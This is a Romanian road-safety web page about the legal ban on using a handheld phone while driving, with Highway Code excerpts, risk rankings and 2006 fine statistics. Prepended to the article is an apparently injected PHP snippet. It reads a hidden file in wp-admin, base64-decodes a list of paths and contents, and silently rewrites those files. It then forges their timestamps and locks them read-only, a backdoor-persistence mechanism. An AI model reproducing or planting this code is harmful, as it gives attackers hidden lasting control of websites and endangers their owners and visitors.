$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } SIGURANTA RUTIERA – O noua atitudine

ŞOFEAZĂ FĂRĂ TELEFON MOBIL

CODUL RUTIER, Art. 36, al.3
Conducătorilor de vehicule le este interzisă folosirea telefoanelor mobile atunci când aceştia se află în timpul mersului, cu excepţia celor prevăzute cu dispozitive tip ”MÂINI LIBERE”.

NEATENŢIA LA VOLAN DĂUNEAZĂ GRAV VIEŢII!

Art.108. – (1) Săvârşirea de către conducătorul de autovehicul sau tramvai a uneia sau mai multor contravenţii atrage, pe lângă sancţiunea amenzii, şi aplicarea unui număr de puncte de penalizare,
după cum urmează:

a) 2 puncte de penalizare pentru săvârşirea  următoarelor fapte:
– Folosirea telefoanelor mobile în timpul conducerii,  cu excepţia celor prevăzute cu dispozitive de tip  „mâini libere”;

Amenzile contravenţionale se stabilesc în cuantumul determinat de valoarea numărului punctelor-amendă aplicate. Un punct amendă reprezintă valoric 10% din salariul minim brut pe economie, stabilit prin hotărâre a Guvernului.

Iată un top al celor mai riscante acţiuni în timpul condusului:
1. Cel mai grav – încercarea de a apuca un obiect care se mişcă în interiorul maşinii;
2.Privirea unui obiectiv din afara maşinii;
3.Formarea unui număr la un telefon celular;
4.La egalitate : mâncatul, încercarea de a ajunge la un obiect din maşină,  vorbitul la telefon.

Câteva sfaturi pentru minimalizarea acestor riscuri:
– Dacă transportaţi un animal în maşină asiguraţi-vă că este într-o colivie, cuşcă etc.
– Dacă trebuie să mâncaţi sau să beţi în timpul şofatului rugaţi un pasager să vă ajute; dacă sunteţi singur,  aşezaţi-vă aceste obiecte la îndemână.
– Înainte de a pleca fixaţi-vă scaunul, oglinzile, centura, radioul.
– Trageţi pe dreapta când vorbiţi la telefon; dacă trebuie  să conduceţi şi să vorbiţi, atunci luaţi-vă un dispozitiv  hands-free.

În nici un caz nu formaţi dvs. numărul în timp ce conduceţi maşina !

Dar nu doar telefoanele mobile distrag atenţia de la şofat, ci şi mâncatul, urmărirea unei hărţi, încercarea de a ajunge la un obiect din maşină sau urmărirea cu privirea a unui obiectiv din afara maşinii- cum ar fi scena unui accident rutier.

Care dintre acestea are efectul cel mai puternic asupra şoferului?

Apucarea unui obiect care se mişcă în interiorul maşinii este pe primul loc,conform unui studiu din anul 2006 din Statele Unite.

100 de maşini au fost echipate de cercetătorii americani cu camere video şi senzori pentru detectarea accidentelor sau a posibilităţii de a se întampla un accident.

Maşinile au fost conduse cumulativ de 241 de şoferi pe o distanţă de 2 milioane de mile. În acest timp au avut loc 82 de accidente şi 761 de potenţiale accidente.

În anul 2006 au fost aplicate 564.747 sancţiuni contravenţionale, din care:

1.Oprireea ori staţionarea neregulamentară -108.138;
2.Nepurtarea centurii de siguranţă – 89.708;
3.Utilizarea telefonului mobil – 20.484;
4.Depăşirea coloanei la semafor -16.848;
5.Trecerea la culoarea roşie a semaforului – 13.531;
6.Neacordarea priorităţii autovehiculelor – 8.379;
7.Neacordarea priorităţii pietonilor – 5.789.

IA ATITUDINE ÎMPOTRIVA ŞOFERILOR CARE ÎŢI POT PUNE VIAŢA ÎN PERICOL!

By o9admin